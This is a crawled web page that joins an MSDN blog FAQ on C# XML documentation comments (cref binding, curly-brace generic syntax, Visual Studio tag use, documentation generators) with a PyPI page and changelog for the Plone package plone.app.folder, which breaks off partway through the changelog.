generic types? Several of the tags that are recommended in the C# language specification have an attribute named ‘cref’ on them. Cref refers to a code reference. This attribute can be used by tools to create links between different types and members (e.g. object browser uses crefs to create hyperlinks that allow quick navigation to the related type). The C# compiler actually understands the cref attribute to a limited extent. The compiler will try to bind the type or member listed in a cref attribute to a code element defined your source. Assuming that it can it will then fully qualify that member in the generated XML file. For example: using System.Collections; class Program { /// <summary> /// DoSomething takes a <see cref="ArrayList"/> /// </summary> void DoSomething(ArrayList al) { } } This generates the following XML file: <member name="M:Program.DoSomething(System.Collections.ArrayList)"> <summary> DoSomething takes a <see cref="T:System.Collections.ArrayList"/> </summary> </member> Notice that the compiler bound ArrayList and emitted System.Collections.ArrayList instead. I’m sure you’re saying, wow, fascinating, um… but what does that have to do with generics? Good question. Generics complicate doc comments because C# uses angle brackets which would usually be associated with XML. It’s possible just to use the normal escaping mechanisms associated with angle brackets (> <) in XML. Unfortunately this turns out to look fairly ugly: using System.Collections.Generic; /// DoSomething takes a <see cref="List<T>"/> void DoSomething(List<int> al) { } This can become particularly onerous when the generic type has many type arguments. The compiler team decided to improve this by allowing an alternate syntax to refer to generic types and methods in doc comments. Specifically, instead of using the open and close angle-brackets it’s legal to use the open and close curly braces. The example above would then become: /// DoSomething takes a <see cref="List{T}"/> The compiler understands this syntax and will correctly bind List{T} to System.Collections.Generic.List<T>. When the <example> tag is used and there are a number of generic types or methods in the example, an easier approach is to simply surround the example with a CDATA block. That way there is no need to escape less-than signs. Which doc comment tags are understood and used by Visual Studio? There are a number of tags that Visual Studio uses to process or present information: Tag name Tools that make use of the tag summary Completion lists, quick info, class view, class designer, object browser, object test bench param Parameter help, quick info, object test bench, class designer, object browser exception Completion lists, quick info, object browser include C# Compiler returns Object browser see/seealso The ‘metadata as source’ feature, which is invoked when goto definition is performed on a type or member that is defined in metadata, processes a number of the tags documented in the C# language specification and tries to provide a reasonable view. How do I generate HTML or .chm documentation from the XML file? The generated XML file actually doesn’t contain enough information to fully generate good reference documentation. In fact, it was an explicit goal to make the XML file contain just enough information to map the comment back to the associated code element in metadata. Regardless, there are a number of tools that take the assembly and the generated XML file and produce a very nice looking, easy to browse output. NDoc has been a favorite of many developers that I’ve talked to for quite a while. I believe that development on NDoc has slowed somewhat; another option is SandCastle.
http://blogs.msdn.com/b/ansonh/archive/2006/09/11/750056.aspx
CC-MAIN-2015-11
refinedweb
1,026
52.39
The read_html() function of the pandas DataFrame module reads the pandas.DataFrame.read_html() can be used for data wrangling or data scraping. Let's take a closer look at the syntax, parameters, and return values. pandas.read_html(io, match='.+', flavor=None, header=None, index_col=None, skiprows=None, attrs=None, parse_dates=False, thousands=',', encoding=None, decimal='.', converters=None, na_values=None, keep_default_na=True, displayed_only=True) Here are some argument values: io: This is a string or path-like object. It can also be a URL or an HTML file itself. match: This can be a string or a regular expression. It filters data based on match conditions or REs. The default value is .+, which means any non-empty string match. header: A list-like object or integer value is used to create the starting column(s) as a header. The default value for this parameter is None. index_col: A list-like object or integer value is used to create the index. The default value is None. skiprows: This can be a list-like object or an integer showing the indexes skipped. The default is None. attrs: This shows a Python dictionary containing the attributes of the table to filter. Also, the default value is None. na_values: This is used to handle null, empty, or NaN values. dfs: This returns a list of DataFrames. In the below code snippet, we are going to use the pd.read_html() function to parse an HTML file into a pandas DataFrame. import pandas as pd # invoking read_html() to load employee.html file df_list = pd.read_html("employee.html") # print out parsed html file data as data frames print(df_list) main.py pd.read_html("employee.html")keyword will load the employee.htmlfile as a list of data frames. It is used to parse each table tag as a different data frame. print(df_list)keyword will print the list of DataFrames. employee.html This file contains records of three employees as an HTML document. RELATED TAGS CONTRIBUTOR View all Courses
https://www.educative.io/answers/how-to-use-the-readhtml-function-to-read-html-to-a-dataframe
CC-MAIN-2022-33
refinedweb
330
61.83
Join the community to find out what other Atlassian users are discussing, debating and creating. Hey, I would like to set a condition on JIRA for the linked issues. For example, I link a issue(A) from one project to another project's issue(B). I want to set a condition in which if the status of the linked issue(A) is in "Backlog" and the other issue(B) is also in "backlog". If I want to move issue B from Backlog to Dev completed but this transition should not happen until issue A is moved to the completed state. Please help me with a solution to this. Hi @JIRA Administrator , If you have a Script Runner add-on, you can do it with a custom script. You can put a script condition to Backlog -> DEV step in a workflow of issue B. It checks whether linked A issue is completed or not. If issue A is completed, button will be visible in issue B. Sample code; (I assume you linked issue from A to B). You can customize it. import com.atlassian.jira.component.ComponentAccessor; import com.atlassian.jira.issue.link.IssueLink; passesCondition = true; def issueLinkManager = ComponentAccessor.getIssueLinkManager() for (IssueLink link in issueLinkManager.getInwardLinks(issue.getId())) { def destIssue = link.getSourceObject(); if(!destIssue.getStatusId().equals("10000")){ //Ex Status id of DONE passesCondition = false; } }.
https://community.atlassian.com/t5/Jira-questions/Link-issue-condition/qaq-p/1214164
CC-MAIN-2019-47
refinedweb
223
59.6
SmartCardDriverManager::runDriver() Run the smart card or smart card reader driver. Synopsis: #include <smartcard_spi/SmartCardDriverManager.hpp> virtual sc_response_code_t smartcard_spi::SmartCardDriverManager::runDriver()=0 Since: BlackBerry 10.3.0 Arguments: Library:libscs (For the qcc command, use the -l scs option to link against this library) Description: This function runs the smart card or smart card reader driver. By calling this function, the driver provides threads to the smart card framework to operate the driver. This function will not return unless the driver no longer needs to run or a catastrophic failure occurs. If the driver no longer needs to run, all calls to will return with the SCARD_S_SUCCESS return code. It is expected that the driver main function will then exit, and the driver process will terminate. The driver process will be restarted when needed. At least 2 threads should be passed in. Having 4 threads is recommended. Returns: If successful, SCARD_S_SUCCESS is returned. Otherwise, an error code is returned. Last modified: 2014-06-24 Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus
http://developer.blackberry.com/native/reference/core/com.qnx.doc.smartcard.lib_ref/topic/SmartCardDriverManager_runDriver.html
CC-MAIN-2016-44
refinedweb
180
60.82
Mark Phippard wrote: > Entered an enhancement. > > > > The previously mentioned ID was for the problem described in the email > subject but not the one that this thread has drifted to, We have a requirement for people to be shown and given the opportunity to change the properties on a file. We are storing specifications in Subversion and have built a Web front end which shows properties like the document issue level, status etc. and stores them as properties on the file. What we would really like is for people to be able to check out those files using a standard Subversion client and on commit be presented with those properties and their current values and be able to change them. My preference is for an additional property in the svn: namespace called something like svn:requiredprops which lists properties which are required to be set for this file. The client would then list those properties in the commit message editor (as Kristis Makris proposed in this thread) with their current values and then set them before commiting. The command line client would put them in the text sent to the users text editor, a GUI could show them as name/value pairs on the commit form. There would also need to be a command line option to specify these properties so that the commit message and the properties can be set without going via a text editor and in that case if any of the required properties were missing the commit would fail. This does present a UI problem - the commit message is not a versioned property but the file properties are. This means that the properties for each file which is being committed have to be handled in the editor and the command line version has to be able to specify the property settings for each file. My guess is that for the command line UI the properties should be put in a file and the command line refer to that file. Should I add this text to the issue? --.
http://svn.haxx.se/dev/archive-2004-07/1261.shtml
CC-MAIN-2015-11
refinedweb
340
62.01
Hi. I need help starting this assignment. The teacher/class is way over my head and I HAVE to do well on this assignment to pass… So if anyone could assist me in doing and understanding this assignment, it would be greatly appreciated. Thank you! We will write a program to solve word jumbles. You have probably seen them in the newspaper every day. Quick - what word is formed from the letters ‘mezia’? ‘cidde’? ‘hucnah’? ‘bouste’? Your program will solve these by brute force. It will have a list of English words (from Program 8, Spell Checker), and it will generate all permutations of the letters in the jumble. When it finds a permutation that is in the word list, its done. Requirements First, use your WordListIndexed to store the English language dictionary from the Spell Checker program. Our jumbles won’t contain any punctuation marks or abbreviations. Don’t store them in your WordListIndexed. The primary class in this assignment, StringPermutationIterator, generates all the permutations of the letters in a given string. This class must have an iterator interface: next( ) and hasNext( ) (no remove( ) member function). There are two major challenges for this class. First, generate the permutations recursively. For example, to generate the permutations of a four letter string, put one of the four letters as the first letter and combine it will all permutations of the remaining 3 letters. Repeat until each letter has been used at the front (see example). For simplicity, you may assume that all the letters in the input string are unique (no duplications). If this assumption does not hold then we simply generate some duplicates that cause your program to run a little slower. We still get the correct result. Second, you must generate the permutations incrementally. It is not allowed to generate all permutations, store them in a list, and have the iterator walk down the list. Nor is it allowed to utilize the fact that there will be exactly n! permutations. You must create a true dynamic iterator that generates one at a time the elements of the set of permutations. See the general plan for dynamic iterators*. Primary classes: StringPermutationIterator. Application: Write a short main method that unscrambles the 4 jumbles from the first paragraph of this assignment plus ‘ueassrkpc’. See example: SPI(“cats”) ‘c’ + an of SPI(“ats”). When SPI(“ats”) rolls over (false == hasNext()), create an new nested SPI object ‘a’ + an object SPI(“cts”). When SPI(“cts”) rolls over, create a new SPI object ‘t’ + an object SPI(“cas”) create SPI(“cat”) ‘s’ + an object SPI(“cat”) When SPI(“cat”) rolls over, we are done. SPI(“cats”).hasNext() == false General plan for dynamic iterators: public class DynamicIterator<String> implements Iterator<String> { String buffer; boolean hasNext() { return buffer != null; } String next() { String result = buffer; buffer = createNextElement(); return result; } }
https://www.sitepoint.com/community/t/jumble-solver/374378
CC-MAIN-2021-39
refinedweb
471
57.06
RPI.GPIO New Feature GPIO.RPI_INFO replaces GPIO.RPI_REVISION. May I present… GPIO.RPI_INFO …which outputs a Python dictionary containing several useful pieces of information. In the screenshot below you can see the output from my Raspberry Pi 2B in a live Python session… It gives you… {'P1_REVISION': 3, 'RAM': '1024M', 'REVISION': 'a01041', 'TYPE': 'Pi2 Model B', 'PROCESSOR': 'BCM2836', 'MANUFACTURER': 'Sony'} …but supposing you only wanted one piece of information. How would you get it? It’s quite simple really. You use the name to get the value. That’s what a Python dictionary is for. Supposing we wanted to know what kind of GPIO header our Pi had, just like we used to use GPIO.RPI_REVISION, we now use… GPIO.RPI_INFO['P1_REVISION'] …in our case, this would return an integer 3 because the 40 pin Pi2/B+/A+ header is the third revision of the GPIO header. This gives you the exact information you would have previously obtained from GPIO.RPI_REVISION. If you wanted to put this information into a variable you’d do it like this… gpio_header_rev = GPIO.RPI_INFO['P1_REVISION'] Additionally, you can now get a whole load of other, new, useful information too. Here’s A List You can use each of the following to grab whichever piece of information you’re after from the GPIO.RPI_INFO dictionary… - GPIO.RPI_INFO[‘P1_REVISION’] - GPIO.RPI_INFO[‘RAM’] - GPIO.RPI_INFO[‘REVISION’] - GPIO.RPI_INFO[‘TYPE’] - GPIO.RPI_INFO[‘PROCESSOR’] - GPIO.RPI_INFO[‘MANUFACTURER’] …but bear in mind that they all return a string apart from P1_REVISION, which returns an integer. Here’s A Script To Make It Easy To make it easy, I’ve written a short Python script (in Python 3), which shows the whole dictionary output and then each of its elements in turn. from RPi import GPIO print("Raw output from GPIO.RPI_INFO:\n",GPIO.RPI_INFO) print("Output from GPIO.RPI_INFO['P1_REVISION']\n",GPIO.RPI_INFO['P1_REVISION']) print("Output from GPIO.RPI_INFO['RAM']\n",GPIO.RPI_INFO['RAM']) print("Output from GPIO.RPI_INFO['REVISION']\n",GPIO.RPI_INFO['REVISION']) print("Output from GPIO.RPI_INFO['TYPE']\n",GPIO.RPI_INFO['TYPE']) print("Output from GPIO.RPI_INFO['PROCESSOR']\n",GPIO.RPI_INFO['PROCESSOR']) print("Output from GPIO.RPI_INFO['MANUFACTURER']\n",GPIO.RPI_INFO['MANUFACTURER']) You would run this script by typing sudo python3 scriptname.py, where scriptname.py is whatever you chose to call it. This is what the output from that script looks like… Why Was This Done? When the Pi2 came out, things changed a bit. Not only do we now have 3 different kinds of GPIO header on the consumer versions of the Pi, but we also have 3 different quantities of RAM and two different processors. So it’s really sensible to create a mechanism whereby we can find out, programatically, exactly what sort of machine we’re running on. GPIO.RPI_INFO does precisely that. We can now grab the exact information we need about GPIO header, RAM and CPU and even some extras like manufacturer, product name and revision number. It’s useful. So let’s use it. GPIO.RPI_REVISION still works, for now, but if you have RPi.GPIO 0.5.10 or newer, you should start getting into the habit of using the newer GPIO.RPI_INFO because at some point, GPIO.RPI_REVISION will disappear. RasPiO® GPIO Reference Aids Our sister site RasPiO has three really useful reference products for Raspberry Pi GPIO work... Trying this I found that a lot of the fields return “unknown” only the P1_revision and revision fields were returned. Have I missed something? Just tried it on a Pi Zero running Jessie and got this… python3 revtest.py Raw output from GPIO.RPI_INFO: {‘RAM’: ‘512M’, ‘PROCESSOR’: ‘BCM2835’, ‘REVISION’: ‘900092’, ‘TYPE’: ‘Unknown’, ‘P1_REVISION’: 3, ‘MANUFACTURER’: ‘Sony’} Output from GPIO.RPI_INFO[‘P1_REVISION’] 3 Output from GPIO.RPI_INFO[‘RAM’] 512M Output from GPIO.RPI_INFO[‘REVISION’] 900092 Output from GPIO.RPI_INFO[‘TYPE’] Unknown Output from GPIO.RPI_INFO[‘PROCESSOR’] BCM2835 Output from GPIO.RPI_INFO[‘MANUFACTURER’] Sony Here is my output on a B+ pi@raspberrypi ~ $ sudo python3 rpi_info.py Raw output from GPIO.RPI_INFO: {‘P1_REVISION’: 3, ‘RAM’: ‘Unknown’, ‘REVISION’: ‘0010’, ‘TYPE’: ‘Unknown’, ‘PROCESSOR’: ‘Unknown’, ‘MANUFACTURER’: ‘Unknown’} Output from GPIO.RPI_INFO[‘P1_REVISION’] 3 Output from GPIO.RPI_INFO[‘RAM’] Unknown Output from GPIO.RPI_INFO[‘REVISION’] 0010 Output from GPIO.RPI_INFO[‘TYPE’] Unknown Output from GPIO.RPI_INFO[‘PROCESSOR’] Unknown Output from GPIO.RPI_INFO[‘MANUFACTURER’] Unknown pi@raspberrypi ~ $ Well that doesn’t look right. Is your Raspbian up to date? I’ve done the full update recommended in part one of this series sudo apt-get update && sudo apt-get upgrade so I presume it is up to date. Now flashed a new SD card with the latest version of Jessie with the same result. So I guess this is a hardware or firmware fault with my Pi That is a bit puzzling. Does it happen with the same SD card(s) on your other Pis? AFAIK there’s nothing going wrong here – the information displayed by GPIO.RPI_INFO is automatically “decoded” from the new-style board revision IDs used by the Pi2 (a01041) and Pi Zero (900092). Boards using the “old-style” board revision IDs (A, A+, B, B+) don’t have this “extra info” encoded within their revision ID, and so simply get set to “Unknown” by GPIO.RPI_INFO. Strictly speaking, RPi.GPIO shouldn’t even be *trying* to decode the old-style board revision IDs… See also the comments in;a=blob;f=wiringPi/wiringPi.c#l810
http://raspi.tv/2015/rpi-gpio-new-feature-gpio-rpi_info-replaces-gpio-rpi_revision
CC-MAIN-2018-17
refinedweb
903
51.95
not so simple?) Part of the reason is that it’s not really intuitive. True, there is documentation available but how many developers don’t bother reading it (at least until the effort overcomes the pain of using SBT) plus it’s much easier to copy/paste code snippets without completely understanding what they do. That being said SBT is not magic, so let’s try to understand how it works so that next time we’re not reduced to copy/paste cryptic code snippets until it works. A build DSL If you look at a simple build.sbt file it may look something like this: organization := "my.company" name := "demo" licenses += "Apache-2.0" -> url("") libraryDependencies += "org.typelevel" %% "cats-core" % "1.0.0-RC1" At first glance it looks similar to a Maven POM file but simpler as it doesn’t use the more verbose XML syntax. We can find similar things like - declaration of the project name and organisation - declaration of the dependencies - … So if it’s not XML what language is it? Well, this is plain Scala code. In fact this is actually a Scala DSL for describing a build and, of course, as it’s Scala code it has to be compiled before you can build your project This brings up to the lifecycle of the build: - Compile the build project - Execute the build project to create the build definition - Interpret the build definition to create a task graph for the build - Execute the task graph to actually build your project Let’s get back to each of them in more details: Compiling the build project This is where the build.sbt file is compiled (Remember that although it looks like a declarative language this is actually plain Scala code and therefore has to be compiled). There is a special project (called project) which can also contain some Scala code. project code is part of the build itself and not of your project code (It starts to get confusing, doesn’t it?). This is typically in this folder that you add the plugins needed for the build. You can also declare your dependencies in this folder or any custom tasks (more on that later). project is itself recursive. You can nest a project folder inside project and add some code (E.g. dependencies declaration) in it. This will be compiled before compiling the parent project. Basically the project is a build inside your build that knows how to build your build. And it’s recursive so project/project is a build that knows how to build the build of your build (as explained here). A build compilation failure (not the project compilation) will prevent SBT to start with this kind of error: [error] (*:update) sbt.ResolveException: unresolved dependency: xxx#yyy;x.y.z: not found Project loading failed: (r)etry, (q)uit, (l)ast, or (i)gnore? In this case it indicates a problem with the dependencies of the build itself (and failed because it couldn’t compile the build project itself). This shouldn’t be mistaken with a problem with your project dependencies. A project dependencies issues won’t prevent SBT to start. Here you should have a look of dependencies of the build itself (e.g. check the plugin declarations). The difference between the build.sbt and a scala file is that build.sbt already import the following import sbt._ import Process._ import Keys._ This allows you to start defining your build straight away. When using a scala file you need to explicitly import them if you need. Execute the build project to create the build definition I believe this is the most confusing stage as this phase just doesn’t exists in the Maven world. In Maven it’s simple you parse the XML to create the build definition and then you execute the build. Here it’s different we need to execute the Scala code in the build to create the build definition and only then we can run the build itself. Moreover setting up the build is done in 2 steps: - Compile the scala code to create the build definition (a set of projects containing some settings) - Interpret the build definition to create the “build execution plan” (a task graph that models dependencies between tasks) Only then the task graph can be executed to run the build. But let’s get back to what the build definition is. Simply put the build definition is just a list list of key-value pairs. And as SBT support multi-projects (a.k.a. submodules) these key-value pairs are grouped by project. lazy val root = (project in file(".")) .settings( name := "demo", scalaVersion := "2.12.4" ) If you have a single project there is no need to declare the root project you can place your key-value pairs directly in the build.sbt. These key-value pairs are known as Setting. Setting keys are typed and can there are 3 different types: SettingKey[T]evaluated once when SBT starts (or with reloadcommand) TaskKey[T]is evaluated every time a command is run InputKey[T]is for tasks taking arguments (e.g. testOnly *.SomeSpec) The value itself is known as the task body and needs to return a value of type T (the same type as declared in the key). The body can contain any Scala code. Of course there are many predefined keys but it’s also possible to define your own. You can find more information on this phase over here. Interpret the build definition to create a task graph for the build We’ve seen that SBT provides a DSL to defined tasks ( Setting can be considered as a Task that runs only once). This makes SBT a Task engine but in order to run the tasks correctly (i.e. in the right order) SBT must analyse the dependencies between tasks. Let’s take an example. Imagine a task “buildInfo” that generates Scala code (a Scala object) with some information about the build. (This is a very basic example – there is a real plugin for that:) version := "1.0.3" // define the task key lazy val buildInfo = taskKey[Seq[File]]("Generates basic build information") // define the task body buildInfo := { val f = sourceManaged.value / "BuildInfo.scala" val v = version.value val i = java.time.Instant.now() IO.write(f, s""" |import java.time.Instant | |object BuildInfo { | val version: String = "$v" | val time: Instant = Instant.ofEpochMilli(${i.toEpochMilli}L) |} """.stripMargin ) // returns a Seq[File] as declared in the key f :: Nil } // add the task to the list of source generators sourceGenerators in Compile += buildInfo Inside the task body there are 2 variables f and v that actually depends on other tasks (or settings). You can see that to retrieve the values for the version and sourceManaged folder we couldn’t use them directly (because they are tasks and not values) so we have to call .value to retrieve the value of the task. This .value is the trick used by SBT to build the dependency graph. Behind the scenes it triggers a macro that allows SBT to lift the dependencies outside of the task body. You can query the dependency graph by using the inspect tree command. sbt:demo> inspect tree buildInfo [info] *:buildInfo = Task[scala.collection.Seq[java.io.File]] [info] +-*:sourceManaged = target/scala-2.12/src_managed [info] | +-*:crossTarget = target/scala-2.12 [info] | +-*/*:crossPaths = true [info] | +-*:pluginCrossBuild::sbtBinaryVersion = 1.0 [info] | | +-*/*:pluginCrossBuild::sbtVersion = 1.0.3 [info] | | [info] | +-*/*:sbtPlugin = false [info] | +-*/*:scalaBinaryVersion = 2.12 [info] | +-*:target = target [info] | +-*:baseDirectory = [info] | +-*:thisProject = Project(id tmp, base: /private/tmp, configurations: List(compile, runtime, test, provided, optional), plugins: List(<none>), autoPlugins: List(sbt.plugins.CorePlugin,.. [info] | [info] +-*:version = 1.0.3 [info] We can see that buildInfo depends on sourceManaged and version. The official documentation is here. Execute the task graph to actually build the project SBT is now ready to execute a task by running as many dependent tasks in parallel as it could (according to the graph). If task C depends on tasks A and B (and A and B don’t depend on each other) then SBT can run A and B in parallel and then C. So far we’ve covered quite a lot of grounds. We’ve learned the lifecycle of a build, how to define tasks or settings and how to check the dependencies of a task. By now we should start to feel more confortable working with SBT but there is still something quite puzzling that we need to understand to leverage all the power of SBT: scopes. Scopes So far we’ve seen that a setting or task key is always linked to a single value or task body. In fact it’s not entirely true. A key also depends on a context. E.g. The project name (key name) is different inside every sub-project. So can be the scala version ( scalaVersion), … SBT calls these context dependencies: Scope axes. There are 3 different axes needed to fully qualified a task: - The project axis - The configuration axis - The task axis The project axis This is the axis we used as an example. You can obviously use different values (tasks) across sub-projects so the project is one of the axis. The configuration axis Similarly inside a project the sources are different when you compile the project or when you compile the tests. The sources task depends on the “Configuration” (Probably not the most suitable name but this is the terminology used in SBT). You can think of the configuration axis as something similar to the maven scope (Remember when we specify that a dependency is already provided or only used in test). In addition there is also a relation between the configurations. E.g. the Test configuration extends the Runtime configuration which extends the Compile configuration. (It kind of makes sense because when you run the tests you want everything available at runtime plus the things needed for testing). The task axis The last axis is the task axis. This is when the value depends on the currently running task. E.g. there are 3 packaging tasks: packageBin, packageSrc, PackageDoc. They all depends on packageOptions but we can have different values for packageOptions for any of these 3 tasks. This is done by using the task axis. Specifying scopes When you create a task (or setting) in your build it is always scoped even when you don’t specify any axes. In this case SBT uses the following scopes by default: - the project axis is set to the current project - the configuration axis is set to Global - the task axis is set to Global But what is this Global scope? Well, you can think of it as the default or fallback scope. If there is no value defined for the current scope SBT will try to find a value using a more general scope until it reaches the Global scope. This brings up to the scope resolution topic. Remember that we have 3 different scopes available: project, configuration and tasks. In theory you can combine any possible values along these 3 axes to define a task. Think of it like a cube or 3d-matrix. That’s a log of possible values but in practice many of them don’t make any sense at all. So there is no need to define a task body for these “impossible” combinations. Then there are several scopes that actually need to use the same task body or value. In this case you want to define the task only once. Typically for the most generic scope and having the more specific scopes fall back to it when SBT tries to resolve the task scope. This is how the scope resolution (or scope delegation) works: - On the task axis: if the task is undefined under the current task fallback to Global - On the configuration axis: if the task is undefined under the current configuration, tries the parent configuration (if no parents fallback to Global). - On the project axis: if the task is undefined under the current project, tries the special scope ThisBuild, then the Globalscope. - If several scopes are resolved the project axis takes precedence over the configuration axis over the task axis More information and examples can found in the official documentation. Something that might look like a recursive task is actually not recursive but delegating to a more generic scope: lazy val lines = settingKey[List[String]]("Demonstrate scope delegation") // the initial list lines in (Global) := "line in scope (*,*,*)" :: Nil // prepend to the initial list lines := "line in scope(ThisBuild,*,*)" :: lines.value If you run this in SBT you’ll get: sbt> lines [info] * line in scope(ThisBuild,*,*) [info] * line in scope (*,*,*) lines.value on the last line resolved to the lines defined in the global scope (*,*,*) ( * means Global and {.} means ThisBuild). As you can see resolving a task might be rather tricky. Fortunately SBT provide some help with the inspect command sbt:tmp> inspect lines [info] Setting: scala.collection.immutable.List[java.lang.String] = List(line in scope(ThisBuild,*,*), line in scope (*,*,*)) [info] Description: [info] Demonstrate scope delegation [info] Provided by: [info] {file:/tmp/}tmp/*:lines [info] Defined at: [info] /tmp/build.sbt:3 [info] Delegates: [info] *:lines [info] {.}/*:lines [info] */*:lines [info] Related: [info] */*:lines You can invoke a specifically scoped task or setting using SBT command line by specifying the scope as follow: sbt> project/Configuration:Task::command Of course you don’t have a complete scope, it’s possible to omit any of the scope axes. Chaining tasks So far we’ve seen that we can use the value returned by a task into another task. It works fine but it might be hard to manage. Consider the case where you have a task that depends on 2 other tasks. lazy val A = taskKey[Unit]("Task A") A in Global := { println("Task A") } lazy val B = taskKey[Unit]("Task B") B in Global := { println("Task B") } lazy val C = taskKey[Unit]("Task C") C := { A.value B.value } When you run task C, tasks A and B run too (because C depends on both of them). However A and B don’t depend on each other so SBT runs them in parallel. There is nothing wrong with it but it might not be what you want. Sequential tasks Let’s change the definition of A to make it fail. lazy val A = taskKey[Unit]("Task A") A in Global := { println("Task A") throw new Exception("Oh no!") } You may think that B runs only when A succeed but it’s not the case. For that we need to run the tasks in sequence. This is done by using Def.sequential. C := Def.sequential(A, B).value Rewiring with dynamic task Dynamic task ( Def.taskDyn) can also be used to chain tasks together. It allows to return a task instead of a value. C := (Def.taskDyn { val a = A.value Def.task { B.value a } }).value We execute task A and then a task that executes B and return the result from A. What’s cool is that since we return the result from A we can rewire A directly: A := (Def.taskDyn { val a = A.value Def.task { b.value a } }).value For a more concrete example you can check the documentation where compile is rewired to run both compile and scalastyle (and still returning the result of compile). Commands If you find yourself having to type too many sbt commands to perform only one operation you probably want to group them together using Command. Imagine that you’re using both scalastyle and scalafmt on your project and you want to run them across all configurations (compile, test, it). That’s 6 commands to type in. You can easily group them together: commands += Command.command("validate") { state => "compile:scalastyle" :: "test:scalastyle" :: "it:scalastyle" :: "compile:scalafmt::test" :: "test:scalafmt::test" :: "it:scalafmt::test" :: "sbt:scalafmt::test" :: state } Conclusion This pretty long post on SBT should have cover enough to make you understand most of SBT’s cryptic syntax. Hopefully you should now be ready to understand most of SBT files and no longer afraid to try and experiment for yourself. SBT plugins are obviously missing but there’re nothing more than some code to create additional settings on your projects (and you should now be able to understand that too).
https://www.beyondthelines.net/computing/understanding-sbt/
CC-MAIN-2019-30
refinedweb
2,735
63.59
Pi19404January 23, 2014 Contents ContentsUniform LBP Features and Spatial Histogram Computation0.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0.2 Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 8 8 2|8 Uniform LBP features are considered as one which have only 2 contigious regions corresponding to 0s and 1s,while non uniform LBP have more than 1 contigious regions corresponding to 0s and 1s. This we need a mapping from which assign each on 28 possible codes to one of 58 encoded uniform LBP values. All the non uniform codes are assigned to a single values. The uniform LBPs can be viewed as corners,line,ramp gradient The non uniform LBPs are assumed to be irrelevant and can be ignored. A uniform binary pattern can be identified by performing a bit wise traversal and checking if number of bit transitions are atmost 2 . This is done by first circular right/left shifting the given code and performing XOR operation with the original code. Since we need to only consider 8 bit numbers ,we need perform circular shift and masking MSB for integers. int rightshift(int num, int shift) { //right shift the number to right 3|8 //left shift numbers and mask the MSB for 8 bit number return (num >> shift) | ((num << (8 - shift)&0xFF)); Now number of bit operations is simply the number of set bits in the result The code for this can be as follows int countSetBits(int code) { int count=0; while(code!=0) { if(code&&0x01) count++; code=code>>1; } return count; } bool checkUniform(int code) { int b = rightshift(code,1); int c = code ^ b; int count=countSetBits(c); if (count <=2) return true; else return false; } the method to count bits is naive way and since we are using 8 bit words,it will take 8 iterations of the for loop. Brian Kernighans method performs this by going through as many iterations as set bits int countSetBits(int code) { int count=0; int v=code; for(count=0;v;count++) { v&=v-1; //clears the LSB } return count; } 4|8 The result can be precomputed for possible input code to determine if a LBP is a uniform code or not. The next task is to map the LBP codes to one of 58 uniform codes. The encoding will be done along the rows as per the below figure Since we known the possible input codes before hand,we can prepare a lookup table before hand to check if a uniform code or not Now if it is a uniform code we need to map it to one of possible 58 codes. 5|8 To do this we move from all numbers from 0 28 ,check if they are uniform and assign them to a one of 58 possible code. However we can see than //3x3 neighborhood will have 8 neighborhood pixels //all non uniform codes are assigned to 59 void initUniform() { lookup.resize(255); int index=0; for(int i=0;i<=255;i++) { bool status=checkUniform(i); if(status==true) { lookup[i]=index; index++; } else { lookup[i]=59; } } } Thus we modify the existing lbp image code to return only uniform lbp coded as destination lbp image by performing a simple lookup operations. Now next task is to compute a spatial histogram,the histogram may be computed over the entire image or dividing the image into grids ocv::Histogram hist; //class for computing histogram vector<float> spatialHistogram(Mat lbpImage,Size grid) { //feature vector vector<float> histogram; histogram.resize(grid.width*grid.height*59); int width=lbpImage.cols/grid.width; int height=lbpImage.rows/grid.height; int cnt=0; //#pragma omp parallel for 6|8 for(int i=0;i<grid.height;i++) { for(int j=0;j<grid.width;j++) { Mat cell=lbpImage(Rect(j*width,i*height,width,height)); Mat cell_hist=computeHistogram(cell); Mat tmp_feature; //reshape the feature vector into 1 row cell_hist.reshape(1,1).convertTo(tmp_feature,CV_32FC1); float * ptr=tmp_feature.ptr<float>(0); for(int k=0;k<tmp_feature.cols;k++) { //if no LBP feature is found assing it a small value if(ptr[k]==0) ptr[k]=1/58; //update the histogram vector histogram[cnt*59+k]=ptr[k]; } cnt++; } } } return histogram; The LBP spatial histogram can be used as a texture descriptor. However the LBP image is a gradient image in some sense,it encode information about different types of gradiants The LBP pattern can be used to identify isolated corners or flat region ( all 0 or 1) The LBP pattern can be used to identify corner a continuous run of 0 or 1 of length (5-8 and its rotated version) The LBP pattern can be used to identify a edge a continous run of 0 or 1(length 4 and rotated version ) The LBP pattern can be used to identify horizontal or vertical edge ( vertical/horizontal run of 0 and 1 ) The LBP pattern can be used to identiy a line end (1000000 and its rotated version) The LBP pattern with 2 continous 12 can be considered as a horizonal or vertical line 7|8 0.2 Code The code for the same can be found at git rep. com/pi19404/OpenVision/ in ImgFeatures/lbpfeatures.cpp and ImgFeatures/lbpfeatures.hpp files. 8|8
https://id.scribd.com/document/201654215/Uniform-Local-Binary-Pattern-and-Spatial-Histogram-Computation
CC-MAIN-2019-39
refinedweb
866
54.36
plone.app.folder 1.0.6 Integration package for `plone.folder` into Plone Overview This package provides base classes for folderish Archetypes / ATContentTypes content types based on B-trees, a.k.a. “large folders” in Plone. Storing content in such folders provides significant performance benefits over regular folders. The package only contains the integration layer for the base class provided by plone.folder, however. Please see there for more detailed information. Caveats If you are using plone.app.folder in your product you may notice that PloneTestCase will fail to setup a Plone site for your functional tests. This can be resolved by adding this line to your functional test source: from plone.app.folder.tests import bbb Changelog 1.0.6 (2014-01-27) - Fix test for Plone 4, so we really only apply the reindexOnReorder patch when we are on Plone 3. [maurits] 1.0.5 (2013-01-13) - Only set up the folder content type if Archetypes is present. [davisagli] 1.0.4 - 2011-01-03 - Depend on Products.CMFPlone instead of Plone. [elro] 1.0.3 - 2010-11-06 - Next/previous folder adapter should not return non-contentish objects, such as local workflow policies as example. This fixes. [thomasdesvenain] 1.0.2 - 2010-08-08 - Adjust tests to work with Zope 2.13 and avoid deprecation warnings. [hannosch] - Show the next viewable item in next/previous viewlet/link, as the behaviour was in Plone 3. This fixes. [mr_savage] 1.0.1 - 2010-07-18 - Update license to GPL version 2 only. [hannosch] 1.0 - 2010-07-07 - Moved migration logic into the BTreeMigrationView to allow 